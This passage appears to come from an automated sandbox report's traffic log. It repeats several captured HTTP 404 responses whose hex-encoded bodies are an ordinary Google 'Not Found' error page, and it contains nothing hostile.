31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:58:31 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:58:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:58:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:58:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:58:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:58:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:58:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 